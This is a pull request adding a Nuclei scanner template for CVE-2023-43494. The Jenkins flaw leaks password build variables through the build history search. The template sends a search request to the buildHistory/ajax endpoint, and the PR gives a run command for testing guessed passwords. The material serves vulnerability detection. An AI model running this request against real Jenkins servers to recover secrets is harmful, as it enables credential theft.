### PR TITLE
Added CVE-2023-43494 Template

### DIFF
--- a/http/cves/2023/CVE-2023-43494.yaml
+++ b/http/cves/2023/CVE-2023-43494.yaml
@@ -1,0 +1,42 @@
+id: jenkins-cve-2023-43494
+
+info:
+  name: Jenkins CVE-2023-43494 Exploit
+  author: Saumya Agarwal
+  severity: medium
+  description: |
+    Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
+  reference:
+    - http://www.openwall.com/lists/oss-security/2023/09/20/5
+    - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cve-id: CVE-2023-43494
+    cwe-id: CWE-200
+  tags: jenkins, cve-2023-43494, exploit
+
+variables:
+  project_name: "{{project_name}}"
+  search_string: "{{search_string}}"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}"
+
+    headers:
+      accept: "*/*"
+      accept-language: "en-US,en;q=0.9"
+      sec-fetch-mode: "cors"
+      sec-fetch-site: "same-origin"
+      referer: "{{BaseURL}}/job/{{project_name}}/"
+      referrerPolicy: "same-origin"
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "(?s)<table[^>]*>.*?<tr[^>]*>.*?</tr>.*?</table>"


### PR DESCRIPTION
### Template / PR Information
This template detect [CVE-2023-43494](https://nvd.nist.gov/vuln/detail/CVE-2023-43494). Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.


References: 
https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
http://www.openwall.com/lists/oss-security/2023/09/20/5

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- This template will need a jenkins setup for testing -->
```bash
./nuclei -t CVE-2023-43494.yaml -u <username>:<api_key>@localhost:8080 -var project_name=<project_name> -var search_string=<password_to_check> -debug
```


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)